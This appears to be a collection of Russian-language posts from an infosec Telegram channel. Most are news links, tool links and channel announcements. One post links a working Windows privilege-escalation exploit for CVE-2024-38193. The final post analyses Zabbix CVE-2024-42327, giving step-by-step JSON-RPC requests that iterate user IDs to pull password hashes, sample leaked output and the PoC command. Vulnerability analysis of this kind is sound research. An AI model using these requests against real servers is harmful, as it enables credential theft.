🗞 Paged Out #5.

• В свободном доступе есть один интересный журнал по информационной безопасности и этичному хакингу. Единственный минус - журнал публикуется на английском языке, но его формат (1 страница = 1 статья) является весьма интересным, а перевести информацию на нужный язык не составит особого труда (особенно chatgpt и deepl).

• Так вот, неделю назад был опубликован 5-й выпуск. Журнал весьма ламповый и полностью бесплатный, а контент собирают авторы со всего света. К слову, Вы можете направить свой материал для публикации, который пройдет модерацию и будет опубликован. Скачать все выпуски можно по ссылке: https://pagedout.institute. Приятного чтения =)

S.E. ▪️ infosec.work ▪️ VT

🔗Ссылка:
https://opennet.ru/62326/

🔗Ссылка:
https://github.com/justakazh/sicat

AWS
Unauthorized Access to Metadata and User Data
*
Link

🔗Ссылка:
https://www.kali.org/blog/contributing-to-kali/

🔗Ссылка:
https://www.securitylab.ru/news/554475.php

🔗Ссылка:
https://www.securitylab.ru/news/554471.php

Наш Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈

P.s. сейчас там открылся набор в PFS Academy

🔗Ссылка:
https://habr.com/ru/companies/bastion/articles/862388/

CVE-2024-38193: Windows LPE

PATCHED: August 13, 2024

https://github.com/Nephster/CVE-2024-38193

P.S. Протестил на Win11, работает

#git #exploit #lpe #pentest #redteam

🔗Ссылка:
https://www.securitylab.ru/analytics/554408.php

🔗Ссылка:
https://www.securitylab.ru/news/554444.php

Привеееет! Всем спасибо за такое количество обратной связи и за то, что вникаете в проблемы канала.
Я решил сделать закрытый канал, чтобы избежать различных блокировок, канал будет бесплатным,
а кто захочет прсото сможет за интересную информацию задонатить🫡
Желаю вам приятного обучения или просто чтения, просьба не флудить, соблюдать правила, уважать друг друга,
не сливать материалы, пользоваться по назначению полученными знаниями, делиться знаниями в ответ и помогать своим товарищам.

Сделал много веток, поскольку и контент у меня разносольный.
Велком в наш закрытый клуб: https://t.me/+0H-FyThRQl1lMzVi
Ссылка на приватный чат также будет в описании этого канала.

🔗Ссылка:
https://www.securitylab.ru/news/554493.php

Как читают отчет по пентесту (нецензурная версия)

🔗Ссылка:
https://securelist.ru/malware-report-q3-2024-non-mobile-statistics/111145/

CVE-2024-42327 / ZBX-25623
*
zabbix SQLi
*
POC

CVE-2024-42327 в Zabbix
1 декабря наткнулся на уязвимость CVE-2024-42327 и решил ее изучить, прочитав пару постов, было сказано, что злоумышленник может внедрять произвольные SQL запросы. Нашел PoC и немного удивился, провел ресерч и ничего общего с SQLi не увидел. Давайте разберемся, о чем же эта бага.

CVE-2024-42327 - это крит уязвимость (CVSS 9.9), связанная с JSON-RPC API Zabbix. Она позволяет хакеру с минимальными правами (пользователь с доступом к API) извлекать конфиденциальные данные о других учетных записях, включая имена, фамилии, идентификаторы и хэшированные пароли. Проблема кроется в неправильной проверке авторизации и прав доступа, а не в манипуляции SQL запросами. Уязвимость базируется на логической ошибке в реализации API. Метод user.get предоставляет доступ к данным, которые не должны быть видны пользователю с минимальными правами. Злоумышленник использует легитимные методы API, такие как user.login и user.get. Запросы передаются в формате JSON, и сервер возвращает ответ.

Результаты запроса включают:
Имя пользователя (username),
Имя (name) и фамилию (surname),
Идентификатор пользователя (userid),
Хэш пароля (passwd)

Внутри исходника присутствует аргумент selectRole в запросе API и может создать впечатление работы с SQL запросами, так как он содержит поля, такие как roleid и u.passwd. Однако это параметры API, а не запросы к БД.

в PoC запускается скрипт cve-2024-42327.py и в нем присутствуют важные этапы.

Первый этап: Аутентификация через API
Метод user.login используется для получения токена сессии, необходимого для выполнения запросов.

{
    "jsonrpc": "2.0",
    "method": "user.login",
    "params": {
        "username": "guest",
        "password": "guest_password"
    },
    "id": 1
}

После этого сервер возвращает токен

{
    "jsonrpc": "2.0",
    "result": "a43530e0eff1f1ce828cc04dca95eb14",
    "id": 1
}

Второй этап: Перебор идентификаторов пользователей. После получения токена, скрипт вызывает метод user.get, перебирай ID пользователей

{
    "jsonrpc": "2.0",
    "method": "user.get",
    "params": {
        "selectRole": ["roleid, u.passwd", "roleid"],
        "userids": "1"
    },
    "auth": "a43530e0eff1f1ce828cc04dca95eb14",
    "id": 1
}

В ответе возвращаются данные с хэшированным паролем

{
    "jsonrpc": "2.0",
    "result": [
        {
            "userid": "1",
            "username": "Admin",
            "name": "Zabbix",
            "surname": "Administrator",
            "passwd": "$2y$10$92nDno4n0Zm7Ej7Jfsz8WukBfgSS/U0QkIuu8WkJPihXBb2A1UrEK"
        }
    ],
    "id": 1
}

Чтобы провернуть эту схему, нужно иметь доступ к JSON-RPC API Zabbix, чаще всего у него такой эндпоинт.

http://zabbix/api_jsonrpc.php

И учетка с минимальными правами, которая может дернуть метод user.login.
Уязвимые версии:

Zabbix 6.0.0–6.0.31
Zabbix 6.4.0–6.4.16
Zabbix 7.0.0.

cve-2024-42327.py -u http://zabbix/api_jsonrpc.php -n Vanya -p Qwerty123

PoC